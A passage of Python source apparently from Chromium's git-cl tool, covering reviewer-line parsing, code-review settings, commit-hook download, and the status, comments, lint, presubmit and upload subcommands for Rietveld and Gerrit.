new_desc = [l for i, l in enumerate(self._description_lines)
if not matches[i]]
self.set_description(new_desc)
# Construct new unified R= and TBR= lines.
r_names = []
tbr_names = []
for match in matches:
if not match:
continue
people = cleanup_list([match.group(2).strip()])
if match.group(1) == 'TBR':
tbr_names.extend(people)
else:
r_names.extend(people)
for name in r_names:
if name not in reviewers:
reviewers.append(name)
if add_owners_tbr:
owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=os.path, glob=glob.glob)
all_reviewers = set(tbr_names + reviewers)
missing_files = owners_db.files_not_covered_by(change.LocalPaths(),
all_reviewers)
tbr_names.extend(owners_db.reviewers_for(missing_files,
change.author_email))
new_r_line = 'R=' + ', '.join(reviewers) if reviewers else None
new_tbr_line = 'TBR=' + ', '.join(tbr_names) if tbr_names else None
# Put the new lines in the description where the old first R= line was.
line_loc = next((i for i, match in enumerate(matches) if match), -1)
if 0 <= line_loc < len(self._description_lines):
if new_tbr_line:
self._description_lines.insert(line_loc, new_tbr_line)
if new_r_line:
self._description_lines.insert(line_loc, new_r_line)
else:
if new_r_line:
self.append_footer(new_r_line)
if new_tbr_line:
self.append_footer(new_tbr_line)
def prompt(self):
"""Asks the user to update the description."""
self.set_description([
'# Enter a description of the change.',
'# This will be displayed on the codereview site.',
'# The first line will also be used as the subject of the review.',
'#--------------------This line is 72 characters long'
'--------------------',
] + self._description_lines)
regexp = re.compile(self.BUG_LINE)
if not any((regexp.match(line) for line in self._description_lines)):
self.append_footer('BUG=%s' % settings.GetBugPrefix())
content = gclient_utils.RunEditor(self.description, True,
git_editor=settings.GetGitEditor())
if not content:
DieWithError('Running editor failed')
lines = content.splitlines()
# Strip off comments.
clean_lines = [line.rstrip() for line in lines if not line.startswith('#')]
if not clean_lines:
DieWithError('No CL description, aborting')
self.set_description(clean_lines)
def append_footer(self, line):
if self._description_lines:
# Add an empty line if either the last line or the new line isn't a tag.
last_line = self._description_lines[-1]
if (not presubmit_support.Change.TAG_LINE_RE.match(last_line) or
not presubmit_support.Change.TAG_LINE_RE.match(line)):
self._description_lines.append('')
self._description_lines.append(line)
def get_reviewers(self):
"""Retrieves the list of reviewers."""
matches = [re.match(self.R_LINE, line) for line in self._description_lines]
reviewers = [match.group(2).strip() for match in matches if match]
return cleanup_list(reviewers)
def get_approving_reviewers(props):
"""Retrieves the reviewers that approved a CL from the issue properties with
messages.
Note that the list may contain reviewers that are not committer, thus are not
considered by the CQ.
"""
return sorted(
set(
message['sender']
for message in props['messages']
if message['approval'] and message['sender'] in props['reviewers']
)
)
def FindCodereviewSettingsFile(filename='codereview.settings'):
"""Finds the given file starting in the cwd and going up.
Only looks up to the top of the repository unless an
'inherit-review-settings-ok' file exists in the root of the repository.
"""
inherit_ok_file = 'inherit-review-settings-ok'
cwd = os.getcwd()
root = settings.GetRoot()
if os.path.isfile(os.path.join(root, inherit_ok_file)):
root = '/'
while True:
if filename in os.listdir(cwd):
if os.path.isfile(os.path.join(cwd, filename)):
return open(os.path.join(cwd, filename))
if cwd == root:
break
cwd = os.path.dirname(cwd)
def LoadCodereviewSettingsFromFile(fileobj):
"""Parse a codereview.settings file and updates hooks."""
keyvals = gclient_utils.ParseCodereviewSettingsContent(fileobj.read())
def SetProperty(name, setting, unset_error_ok=False):
fullname = 'rietveld.' + name
if setting in keyvals:
RunGit(['config', fullname, keyvals[setting]])
else:
RunGit(['config', '--unset-all', fullname], error_ok=unset_error_ok)
SetProperty('server', 'CODE_REVIEW_SERVER')
# Only server setting is required. Other settings can be absent.
# In that case, we ignore errors raised during option deletion attempt.
SetProperty('cc', 'CC_LIST', unset_error_ok=True)
SetProperty('private', 'PRIVATE', unset_error_ok=True)
SetProperty('tree-status-url', 'STATUS', unset_error_ok=True)
SetProperty('viewvc-url', 'VIEW_VC', unset_error_ok=True)
SetProperty('bug-prefix', 'BUG_PREFIX', unset_error_ok=True)
SetProperty('cpplint-regex', 'LINT_REGEX', unset_error_ok=True)
SetProperty('force-https-commit-url', 'FORCE_HTTPS_COMMIT_URL',
unset_error_ok=True)
SetProperty('cpplint-ignore-regex', 'LINT_IGNORE_REGEX', unset_error_ok=True)
SetProperty('project', 'PROJECT', unset_error_ok=True)
SetProperty('pending-ref-prefix', 'PENDING_REF_PREFIX', unset_error_ok=True)
if 'GERRIT_HOST' in keyvals:
RunGit(['config', 'gerrit.host', keyvals['GERRIT_HOST']])
if 'PUSH_URL_CONFIG' in keyvals and 'ORIGIN_URL_CONFIG' in keyvals:
#should be of the form
#PUSH_URL_CONFIG: url.ssh://gitrw.chromium.org.pushinsteadof
#ORIGIN_URL_CONFIG: http://src.chromium.org/git
RunGit(['config', keyvals['PUSH_URL_CONFIG'],
keyvals['ORIGIN_URL_CONFIG']])
def urlretrieve(source, destination):
"""urllib is broken for SSL connections via a proxy therefore we
can't use urllib.urlretrieve()."""
with open(destination, 'w') as f:
f.write(urllib2.urlopen(source).read())
def hasSheBang(fname):
"""Checks fname is a #! script."""
with open(fname) as f:
return f.read(2).startswith('#!')
def DownloadHooks(force):
"""downloads hooks
Args:
force: True to update hooks. False to install hooks if not present.
"""
if not settings.GetIsGerrit():
return
src = 'https://gerrit-review.googlesource.com/tools/hooks/commit-msg'
dst = os.path.join(settings.GetRoot(), '.git', 'hooks', 'commit-msg')
if not os.access(dst, os.X_OK):
if os.path.exists(dst):
if not force:
return
try:
urlretrieve(src, dst)
if not hasSheBang(dst):
DieWithError('Not a script: %s\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % (dst, src))
os.chmod(dst, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
except Exception:
if os.path.exists(dst):
os.remove(dst)
DieWithError('\nFailed to download hooks.\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % src)
@subcommand.usage('[repo root containing codereview.settings]')
def CMDconfig(parser, args):
"""Edits configuration for this tree."""
parser.add_option('--activate-update', action='store_true',
help='activate auto-updating [rietveld] section in '
'.git/config')
parser.add_option('--deactivate-update', action='store_true',
help='deactivate auto-updating [rietveld] section in '
'.git/config')
options, args = parser.parse_args(args)
if options.deactivate_update:
RunGit(['config', 'rietveld.autoupdate', 'false'])
return
if options.activate_update:
RunGit(['config', '--unset', 'rietveld.autoupdate'])
return
if len(args) == 0:
GetCodereviewSettingsInteractively()
DownloadHooks(True)
return 0
url = args[0]
if not url.endswith('codereview.settings'):
url = os.path.join(url, 'codereview.settings')
# Load code review settings and download hooks (if available).
LoadCodereviewSettingsFromFile(urllib2.urlopen(url))
DownloadHooks(True)
return 0
def CMDbaseurl(parser, args):
"""Gets or sets base-url for this branch."""
branchref = RunGit(['symbolic-ref', 'HEAD']).strip()
branch = ShortBranchName(branchref)
_, args = parser.parse_args(args)
if not args:
print("Current base-url:")
return RunGit(['config', 'branch.%s.base-url' % branch],
error_ok=False).strip()
else:
print("Setting base-url to %s" % args[0])
return RunGit(['config', 'branch.%s.base-url' % branch, args[0]],
error_ok=False).strip()
def color_for_status(status):
"""Maps a Changelist status to color, for CMDstatus and other tools."""
return {
'unsent': Fore.RED,
'waiting': Fore.BLUE,
'reply': Fore.YELLOW,
'lgtm': Fore.GREEN,
'commit': Fore.MAGENTA,
'closed': Fore.CYAN,
'error': Fore.WHITE,
}.get(status, Fore.WHITE)
def CMDstatus(parser, args):
"""Show status of changelists.
Colors are used to tell the state of the CL unless --fast is used:
- Red not sent for review or broken
- Blue waiting for review
- Yellow waiting for you to reply to review
- Green LGTM'ed
- Magenta in the commit queue
- Cyan was committed, branch can be deleted
Also see 'git cl comments'.
"""
parser.add_option('--field',
help='print only specific field (desc|id|patch|url)')
parser.add_option('-f', '--fast', action='store_true',
help='Do not retrieve review status')
(options, args) = parser.parse_args(args)
if args:
parser.error('Unsupported args: %s' % args)
if options.field:
cl = Changelist()
if options.field.startswith('desc'):
print cl.GetDescription()
elif options.field == 'id':
issueid = cl.GetIssue()
if issueid:
print issueid
elif options.field == 'patch':
patchset = cl.GetPatchset()
if patchset:
print patchset
elif options.field == 'url':
url = cl.GetIssueURL()
if url:
print url
return 0
branches = RunGit(['for-each-ref', '--format=%(refname)', 'refs/heads'])
if not branches:
print('No local branch found.')
return 0
changes = (Changelist(branchref=b) for b in branches.splitlines())
branches = [c.GetBranch() for c in changes]
alignment = max(5, max(len(b) for b in branches))
print 'Branches associated with reviews:'
# Adhoc thread pool to request data concurrently.
output = Queue.Queue()
# Silence upload.py otherwise it becomes unweldly.
upload.verbosity = 0
if not options.fast:
def fetch(b):
"""Fetches information for an issue and returns (branch, issue, color)."""
c = Changelist(branchref=b)
i = c.GetIssueURL()
status = c.GetStatus()
color = color_for_status(status)
if i and (not status or status == 'error'):
# The issue probably doesn't exist anymore.
i += ' (broken)'
output.put((b, i, color))
# Process one branch synchronously to work through authentication, then
# spawn threads to process all the other branches in parallel.
if branches:
fetch(branches[0])
threads = [
threading.Thread(target=fetch, args=(b,)) for b in branches[1:]]
for t in threads:
t.daemon = True
t.start()
else:
# Do not use GetApprovingReviewers(), since it requires an HTTP request.
for b in branches:
c = Changelist(branchref=b)
url = c.GetIssueURL()
output.put((b, url, Fore.BLUE if url else Fore.WHITE))
tmp = {}
alignment = max(5, max(len(ShortBranchName(b)) for b in branches))
for branch in sorted(branches):
while branch not in tmp:
b, i, color = output.get()
tmp[b] = (i, color)
issue, color = tmp.pop(branch)
reset = Fore.RESET
if not sys.stdout.isatty():
color = ''
reset = ''
print ' %*s : %s%s%s' % (
alignment, ShortBranchName(branch), color, issue, reset)
cl = Changelist()
print
print 'Current branch:',
if not cl.GetIssue():
print 'no issue assigned.'
return 0
print cl.GetBranch()
print 'Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL())
if not options.fast:
print 'Issue description:'
print cl.GetDescription(pretty=True)
return 0
def colorize_CMDstatus_doc():
"""To be called once in main() to add colors to git cl status help."""
colors = [i for i in dir(Fore) if i[0].isupper()]
def colorize_line(line):
for color in colors:
if color in line.upper():
# Extract whitespaces first and the leading '-'.
indent = len(line) - len(line.lstrip(' ')) + 1
return line[:indent] + getattr(Fore, color) + line[indent:] + Fore.RESET
return line
lines = CMDstatus.__doc__.splitlines()
CMDstatus.__doc__ = '\n'.join(colorize_line(l) for l in lines)
@subcommand.usage('[issue_number]')
def CMDissue(parser, args):
"""Sets or displays the current code review issue number.
Pass issue number 0 to clear the current issue.
"""
_, args = parser.parse_args(args)
cl = Changelist()
if len(args) > 0:
try:
issue = int(args[0])
except ValueError:
DieWithError('Pass a number to set the issue or none to list it.\n'
'Maybe you want to run git cl status?')
cl.SetIssue(issue)
print 'Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL())
return 0
def CMDcomments(parser, args):
"""Shows or posts review comments for any changelist."""
parser.add_option('-a', '--add-comment', dest='comment',
help='comment to add to an issue')
parser.add_option('-i', dest='issue',
help="review issue id (defaults to current issue)")
options, args = parser.parse_args(args)
issue = None
if options.issue:
try:
issue = int(options.issue)
except ValueError:
DieWithError('A review issue id is expected to be a number')
cl = Changelist(issue=issue)
if options.comment:
cl.AddComment(options.comment)
return 0
data = cl.GetIssueProperties()
for message in sorted(data.get('messages', []), key=lambda x: x['date']):
if message['disapproval']:
color = Fore.RED
elif message['approval']:
color = Fore.GREEN
elif message['sender'] == data['owner_email']:
color = Fore.MAGENTA
else:
color = Fore.BLUE
print '\n%s%s %s%s' % (
color, message['date'].split('.', 1)[0], message['sender'],
Fore.RESET)
if message['text'].strip():
print '\n'.join(' ' + l for l in message['text'].splitlines())
return 0
def CMDdescription(parser, args):
"""Brings up the editor for the current CL's description."""
cl = Changelist()
if not cl.GetIssue():
DieWithError('This branch has no associated changelist.')
description = ChangeDescription(cl.GetDescription())
description.prompt()
cl.UpdateDescription(description.description)
return 0
def CreateDescriptionFromLog(args):
"""Pulls out the commit log to use as a base for the CL description."""
log_args = []
if len(args) == 1 and not args[0].endswith('.'):
log_args = [args[0] + '..']
elif len(args) == 1 and args[0].endswith('...'):
log_args = [args[0][:-1]]
elif len(args) == 2:
log_args = [args[0] + '..' + args[1]]
else:
log_args = args[:] # Hope for the best!
return RunGit(['log', '--pretty=format:%s\n\n%b'] + log_args)
def CMDlint(parser, args):
"""Runs cpplint on the current changelist."""
parser.add_option('--filter', action='append', metavar='-x,+y',
help='Comma-separated list of cpplint\'s category-filters')
(options, args) = parser.parse_args(args)
# Access to a protected member _XX of a client class
# pylint: disable=W0212
try:
import cpplint
import cpplint_chromium
except ImportError:
print "Your depot_tools is missing cpplint.py and/or cpplint_chromium.py."
return 1
# Change the current working directory before calling lint so that it
# shows the correct base.
previous_cwd = os.getcwd()
os.chdir(settings.GetRoot())
try:
cl = Changelist()
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
files = [f.LocalPath() for f in change.AffectedFiles()]
if not files:
print "Cannot lint an empty CL"
return 1
# Process cpplints arguments if any.
command = args + files
if options.filter:
command = ['--filter=' + ','.join(options.filter)] + command
filenames = cpplint.ParseArguments(command)
white_regex = re.compile(settings.GetLintRegex())
black_regex = re.compile(settings.GetLintIgnoreRegex())
extra_check_functions = [cpplint_chromium.CheckPointerDeclarationWhitespace]
for filename in filenames:
if white_regex.match(filename):
if black_regex.match(filename):
print "Ignoring file %s" % filename
else:
cpplint.ProcessFile(filename, cpplint._cpplint_state.verbose_level,
extra_check_functions)
else:
print "Skipping file %s" % filename
finally:
os.chdir(previous_cwd)
print "Total errors found: %d\n" % cpplint._cpplint_state.error_count
if cpplint._cpplint_state.error_count != 0:
return 1
return 0
def CMDpresubmit(parser, args):
"""Runs presubmit tests on the current changelist."""
parser.add_option('-u', '--upload', action='store_true',
help='Run upload hook instead of the push/dcommit hook')
parser.add_option('-f', '--force', action='store_true',
help='Run checks even if tree is dirty')
(options, args) = parser.parse_args(args)
if not options.force and is_dirty_git_tree('presubmit'):
print 'use --force to check even if tree is dirty.'
return 1
cl = Changelist()
if args:
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
cl.RunHook(
committing=not options.upload,
may_prompt=False,
verbose=options.verbose,
change=cl.GetChange(base_branch, None))
return 0
def AddChangeIdToCommitMessage(options, args):
"""Re-commits using the current message, assumes the commit hook is in
place.
"""
log_desc = options.message or CreateDescriptionFromLog(args)
git_command = ['commit', '--amend', '-m', log_desc]
RunGit(git_command)
new_log_desc = CreateDescriptionFromLog(args)
if CHANGE_ID in new_log_desc:
print 'git-cl: Added Change-Id to commit message.'
else:
print >> sys.stderr, 'ERROR: Gerrit commit-msg hook not available.'
def GerritUpload(options, args, cl, change):
"""upload the current branch to gerrit."""
# We assume the remote called "origin" is the one we want.
# It is probably not worthwhile to support different workflows.
remote = 'origin'
branch = 'master'
if options.target_branch:
branch = options.target_branch
change_desc = ChangeDescription(
options.message or CreateDescriptionFromLog(args))
if not change_desc.description:
print "Description is empty; aborting."
return 1
if CHANGE_ID not in change_desc.description:
AddChangeIdToCommitMessage(options, args)
commits = RunGit(['rev-list', '%s/%s..' % (remote, branch)]).splitlines()
if len(commits) > 1:
print('WARNING: This will upload %d commits. Run the following command '
'to see which commits will be uploaded: ' % len(commits))
print('git log %s/%s..' % (remote, branch))
print('You can also use `git squash-branch` to squash these into a single'
'commit.')
ask_for_data('About to upload; enter to confirm.')
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers, options.tbr_owners, change)
receive_options = []
cc = cl.GetCCList().split(',')
if options.cc:
cc.extend(options.cc)
cc = filter(None, cc)
if cc:
receive_options += ['--cc=' + email for email in cc]
if change_desc.get_reviewers():
receive_options.extend(
'--reviewer=' + email for email in change_desc.get_reviewers())
git_command = ['push']
if receive_options:
git_command.append('--receive-pack=git receive-pack %s' %
' '.join(receive_options))
git_command += [remote, 'HEAD:refs/for/' + branch]
RunGit(git_command)
# TODO(ukai): parse Change-Id: and set issue number?
return 0
def GetTargetRef(remote, remote_branch, target_branch, pending_prefix):
"""Computes the remote branch ref to use for the CL.
Args:
remote (str): The git remote for the CL.
remote_branch (str): The git remote branch for the CL.
target_branch (str): The target branch specified by the user.
pending_prefix (str): The pending prefix from the settings.
"""
if not (remote and remote_branch):
return None
if target_branch:
# Cannonicalize branch references to the equivalent local full symbolic
# refs, which are then translated into the remote full symbolic refs
# below.
if '/' not in target_branch:
remote_branch = 'refs/remotes/%s/%s' % (remote, target_branch)
else:
prefix_replacements = (
('^((refs/)?remotes/)?branch-heads/', 'refs/remotes/branch-heads/'),
('^((refs/)?remotes/)?%s/' % remote, 'refs/remotes/%s/' % remote),
('^(refs/)?heads/', 'refs/remotes/%s/' % remote),
)
match = None
for regex, replacement in prefix_replacements:
match = re.search(regex, target_branch)
if match:
remote_branch = target_branch.replace(match.group(0), replacement)
break
if not match:
# This is a branch path but not one we recognize; use as-is.
remote_branch = target_branch
elif (not remote_branch.startswith('refs/remotes/branch-heads') and
not remote_branch.startswith('refs/remotes/%s/refs' % remote)):
# Default to master for refs that are not branches.
remote_branch = 'refs/remotes/%s/master' % remote
# Create the true path to the remote branch.
# Does the following translation:
# * refs/remotes/origin/refs/diff/test -> refs/diff/test
# * refs/remotes/origin/master -> refs/heads/master
# * refs/remotes/branch-heads/test -> refs/branch-heads/test
if remote_branch.startswith('refs/remotes/%s/refs/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote, '')
elif remote_branch.startswith('refs/remotes/%s/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote,
'refs/heads/')
elif remote_branch.startswith('refs/remotes/branch-heads'):
remote_branch = remote_branch.replace('refs/remotes/', 'refs/')
# If a pending prefix exists then replace refs/ with it.
if pending_prefix:
remote_branch = remote_branch.replace('refs/', pending_prefix)
return remote_branch
def RietveldUpload(options, args, cl, change):
"""upload the patch to rietveld."""
upload_args = ['--assume_yes'] # Don't ask about untracked files.
upload_args.extend(['--server', cl.GetRietveldServer()])
if options.emulate_svn_auto_props:
upload_args.append('--emulate_svn_auto_props')
change_desc = None
if options.email is not None:
upload_args.extend(['--email', options.email])
if cl.GetIssue():
if options.title:
upload_args.extend(['--title', options.title])
if options.message:
upload_args.extend(['--message', options.message])
upload_args.extend(['--issue', str(cl.GetIssue())])
print ("This branch is associated with issue %s. "
"Adding patch to that issue." % cl.GetIssue())
else:
if options.title:
upload_args.extend(['--title', options.title])
message = options.title or options.message or CreateDescriptionFromLog(args)
change_desc = ChangeDescription(message)
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers,
options.tbr_owners,
change)
if not options.force:
change_desc.prompt()
if not change_desc.description:
print "Description is empty; aborting."
return 1
upload_args.extend(['--message', change_desc.description])
if change_desc.get_reviewers():
upload_args.append('--reviewers=' + ','.join(change_desc.get_reviewers()))
if options.send_mail:
if not change_desc.get_reviewers():
DieWithError("Must specify reviewers to send email.")
upload_args.append('--send_mail')
# We check this before applying rietveld.private assuming that in
# rietveld.cc only addresses which we can send private CLs to are listed
# if rietveld.private is set, and so we should ignore rietveld.cc only when
# --private is specified explicitly on the command line.
if options.private:
logging.warn('rietveld.cc is ignored since private flag is specified. '
'You need to review and add them manually if necessary.')
cc = cl.GetCCListWithoutDefault()
else:
cc = cl.GetCCList()
cc = ','.join(filter(None, (cc, ','.join(options.cc))))
if cc:
upload_args.extend(['--cc', cc])
if options.private or settings.GetDefaultPrivateFlag() == "True":
upload_args.append('--private')
upload_args.extend(['--git_similarity', str(options.similarity)])
if not options.find_copies:
upload_args.extend(['--git_no_find_copies'])
# Include the upstream repo's URL in the change -- this is useful for
# projects that have their source spread across multiple repos.
remote_url = cl.GetGitBaseUrlFromConfig()
if not remote_url:
if settings.GetIsGitSvn():
remote_url = cl.GetGitSvnRemoteUrl()
else:
if cl.GetRemoteUrl() and '/' in cl.GetUpstreamBranch():
remote_url = (cl.GetRemoteUrl() + '@'
+ cl.GetUpstreamBranch().split('/')[-1])
if remote_url:
upload_args.extend(['--base_url', remote_url])
remote, remote_branch = cl.GetRemoteBranch()
target_ref = GetTargetRef(remote, remote_branch, options.target_branch,
settings.GetPendingRefPrefix())
if target_ref:
upload_args.extend(['--target_ref', target_ref])
project = settings.GetProject()
if project:
upload_args.extend(['--project', project])
try:
upload_args = ['upload'] + upload_args + args
logging.info('upload.RealMain(%s)', upload_args)
issue, patchset = upload.RealMain(upload_args)
issue = int(issue)
patchset = int(patchset)
except KeyboardInterrupt:
sys.exit(1)
except:
# If we got an exception after the user typed a description for their
# change, back up the description before re-raising.
if change_desc:
backup_path = os.path.expanduser(DESCRIPTION_BACKUP_FILE)
print '\nGot exception while uploading -- saving description to %s\n' \
% backup_path
backup_file = open(backup_path, 'w')
backup_file.write(change_desc.description)
backup_file.close()
raise
if not cl.GetIssue():
cl.SetIssue(issue)
cl.SetPatchset(patchset)
if options.use_commit_queue:
cl.SetFlag('commit', '1')
return 0
def cleanup_list(l):
"""Fixes a list so that comma separated items are put as individual items.
So that "--reviewers joe@c,john@c --reviewers joa@c" results in
options.reviewers == sorted(['joe@c', 'john@c', 'joa@c']).
"""
items = sum((i.split(',') for i in l), [])
stripped_items = (i.strip() for i in items)
return sorted(filter(None, stripped_items))
@subcommand.usage('[args to "git diff"]')
def CMDupload(parser, args):
"""Uploads the current changelist to codereview."""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('--bypass-watchlists', action='store_true',
dest='bypass_watchlists',
help='bypass watchlists auto CC-ing reviewers')
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-m', dest='message', help='message for patchset')
parser.add_option('-t', dest='title', help='title for patchset')
parser.add_option('-r', '--reviewers',
action='append', default=[],
help='reviewer email addresses')
parser.add_option('--cc',
action='append', default=[],
help='cc email addresses')
parser.add_option('-s', '--send-mail', action='store_true',
help='send email to reviewer immediately')
parser.add_option('--emulate_svn_auto_props',
'--emulate-svn-auto-props',
action="store_true",
dest="emulate_svn_auto_props",
help="Emulate Subversion's auto properties feature.")
parser.add_option('-c', '--use-commit-queue', action='store_true',
help='tell the commit queue to commit this patchset')
parser.add_option('--private', action='store_true',
help='set the review private (rietveld only)')
parser.add_option('--target_branch',
'--target-branch',
metavar='TARGET',
help='Apply CL to remote ref TARGET. ' +
'Default: remote branch head, or master')
parser.add_option('--email', default=None,
help='email address to use to connect to Rietveld')
parser.add_option('--tbr-owners', dest='tbr_owners', action='store_true',
help='add a set of OWNERS to TBR')
add_git_similarity(parser)
(options, args) = parser.parse_args(args)
if is_dirty_git_tree('upload'):
return 1
options.reviewers = cleanup_list(options.reviewers)
options.cc = cleanup_list(options.cc)
cl = Changelist()
if args:
# TODO(ukai): is it ok for gerrit case?
base_branch = args[0]
else:
if cl.GetBranch() is None:
DieWithError('Can\'t upload from detached HEAD state. Get on a branch!')
# Default to diffing against common ancestor of upstream branch
base_branch = cl.GetCommonAncestorWithUpstream()
args = [base_branch, 'HEAD']
# Apply watchlists on upload.
change = cl.GetChange(base_branch, None)
watchlist = watchlists.Watchlists(change.RepositoryRoot())
files = [f.LocalPath() for f in change.AffectedFiles()]
if not options.bypass_watchlists:
cl.SetWatchers(watchlist.GetWatchersForPaths(files))
if not options.bypass_hooks:
if options.reviewers or options.tbr_owners:
# Set the reviewer list now so that presubmit checks can access it.
change_description = ChangeDescription(change.FullDescriptionText())
change_description.update_reviewers(options.reviewers,
options.tbr_owners,
change)
change.SetDescriptionText(change_description.description)
hook_results = cl.RunHook(committing=False,
may_prompt=not options.force,
verbose=options.verbose,
change=change)
if not hook_results.should_continue():
return 1
if not options.reviewers and hook_results.reviewers:
options.reviewers = hook_results.reviewers.split(',')
if cl.GetIssue():
latest_patchset = cl.GetMostRecentPatchset()
local_patchset = cl.GetPatchset()
if latest_patchset and local_patchset and local_patchset != latest_patchset:
print ('The last upload made from this repository was patchset #%d but '
'the most recent patchset on the server is #%d.'
% (local_patchset, latest_patchset))
print ('Uploading will still work, but if you\'ve uploaded to this issue '
'from another machine or branch the patch you\'re uploading now '
'might not include those changes.')
ask_for_data('About to upload; enter to confirm.')
print_stats(options.similarity, options.find_copies, args)
if settings.GetIsGerrit():
return GerritUpload(options, args, cl, change)
ret = RietveldUpload(options, args, cl, change)
if not ret:
git_set_branch_value('last-upload-hash',
RunGit(['rev-parse', 'HEAD']).strip())
return ret
def IsSubmoduleMergeCommit(ref):
# When submodules are added to the repo, we expect there to be a single
# non-git-svn merge commit at remote HEAD with a signature comment.
pattern = '^SVN changes up to revision [0-9]*$'
cmd = ['rev-list', '--merges', '--grep=%s' % pattern, '%s^!' % ref]
return RunGit(cmd) != ''
def SendUpstream(parser, args, cmd):
"""Common code for CMDland and CmdDCommit
Squashes branch into a single commit.
Updates changelog with metadata (e.g. pointer to review).
Pushes/dcommits the code upstream.
Updates review and closes.
"""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('-m', dest='message',
help="override review description")
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-c', dest='contributor',
help="external contributor for patch (appended to " +
"description and used as author for git). Should be " +
"formatted as 'First Last <email@example.com>'")
add_git_similarity(parser)
(options, args) = parser.parse_args(args)
cl = Changelist()
current = cl.GetBranch()
remote, upstream_branch = cl.FetchUpstreamTuple(cl.GetBranch())
if not settings.GetIsGitSvn() and remote == '.':
print
print 'Attempting to push branch %r into another local branch!' % current
print
print 'Either reparent this branch on top of origin/master:'
print ' git reparent-branch --root'
print
print 'OR run `git rebase-update` if you think the parent branch is already'
print 'committed.'
print
print ' Current parent: %r' % upstream_branch
return 1
if not args or cmd == 'land':
# Default to merging against our best guess of the upstream branch.
args = [cl.GetUpstreamBranch()]
if options.contributor:
if not re.match('^.*\s<\S+@\S+>$', options.contributor):
print "Please provide contibutor as 'First Last <email@example.com>'"
return 1
base_branch = args[0]
base_has_submodules = IsSubmoduleMergeCommit(base_branch)
if is_dirty_git_tree(cmd):
return 1
# This rev-list syntax means "show all commits not in my branch that
# are in base_branch".
upstream_commits = RunGit(['rev-list', '^' + cl.GetBranchRef(),
base_branch]).splitlines()
if upstream_commits:
print ('Base branch "%s" has %d commits '
'not in this branch.' % (base_branch, len(upstream_commits)))
print 'Run "git merge %s" before attempting to %s.' % (base_branch, cmd)
return 1
# This is the revision `svn dcommit` will commit on top of.
svn_head = None
if cmd == 'dcommit' or base_has_submodules:
svn_head = RunGit(['log', '--grep=^git-svn-id:', '-1',
'--pretty=format:%H'])
if cmd == 'dcommit':
# If the base_head is a submodule merge commit, the first parent of the
# base_head should be a git-svn commit, which is what we're interested in.
base_svn_head = base_branch
if base_has_submodules:
base_svn_head += '^1'
extra_commits = RunGit(['rev-list', '^' + svn_head, base_svn_head])
if extra_commits:
print ('This branch has %d additional commits not upstreamed yet.'
% len(extra_commits.splitlines()))
print ('Upstream "%s" or rebase this branch on top of the upstream trunk '
'before attempting to %s.' % (base_branch, cmd))
return 1
merge_base = RunGit(['merge-base', base_branch, 'HEAD']).strip()
if not options.bypass_hooks:
author = None
if options.contributor:
author = re.search(r'\<(.*)\>', options.contributor).group(1)
hook_results = cl.RunHook(
committing=True,
may_prompt=not options.force,
verbose=options.verbose,
change=cl.GetChange(merge_base, author))
if not hook_results.should_continue():
return 1
# Check the tree status if the tree status URL is set.
status = GetTreeStatus()
if 'closed' == status:
print('The tree is closed. Please wait for it to reopen. Use '
'"git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
elif 'unknown' == status:
print('Unable to determine tree status. Please verify manually and '
'use "git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
else:
breakpad.SendStack(
'GitClHooksBypassedCommit',
'Issue %s/%s bypassed hook when committing (tree status was "%s")' %
(cl.GetRietveldServer(), cl.GetIssue(), GetTreeStatus()),
verbose=False)
change_desc = ChangeDescription(options.message)
if not change_desc.description and cl.GetIssue():
change_desc = ChangeDescription(cl.GetDescription())
if not change_desc.description:
if not cl.GetIssue() and options.bypass_hooks:
change_desc = ChangeDescription(CreateDescriptionFromLog([merge_base]))
else:
print 'No description set.'
print 'Visit %s/edit to set it.' % (cl.GetIssueURL())
return 1
# Keep a separate copy for the commit message, because the commit message
# contains the link to the Rietveld issue, while the Rietveld message contains
# the commit viewvc url.
# Keep a separate copy for the commit message.
if cl.GetIssue():
change_desc.update_reviewers(cl.GetApprovingReviewers())
commit_desc = ChangeDescription(change_desc.description)
if cl.GetIssue():
commit_desc.append_footer('Review URL: %s' % cl.GetIssueURL())
if options.contributor:
commit_desc.append_footer('Patch from %s.' % options.contributor)
print('Description:')
print(commit_desc.description)
branches = [merge_base, cl.GetBranchRef()]
if not options.force:
print_stats(options.similarity, options.find_copies, branches)
# We want to squash all this branch's commits into one commit with the proper
# description. We do this by doing a "reset --soft" to the base branch (which
# keeps the working copy the same), then dcommitting that. If origin/master
# has a submodule merge commit, we'll also need to cherry-pick the squashed
# commit onto a branch based on the git-svn head.
MERGE_BRANCH = 'git-cl-commit'
CHERRY_PICK_BRANCH = 'git-cl-cherry-pick'
# Delete the branches if they exist.
for branch in [MERGE_BRANCH, CHERRY_PICK_BRANCH]:
showref_cmd = ['show-ref', '--quiet', '--verify', 'refs/heads/%s' % branch]
result = RunGitWithCode(showref_cmd)
if result[0] == 0:
RunGit(['branch', '-D', branch])
# We might be in a directory that's present in this branch but not in the
# trunk. Move up to the top of the tree so that git commands that expect a
# valid CWD won't fail after we check out the merge branch.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Stuff our change into the merge branch.
# We wrap in a try...finally block so if anything goes wrong,
# we clean up the branches.
retcode = -1
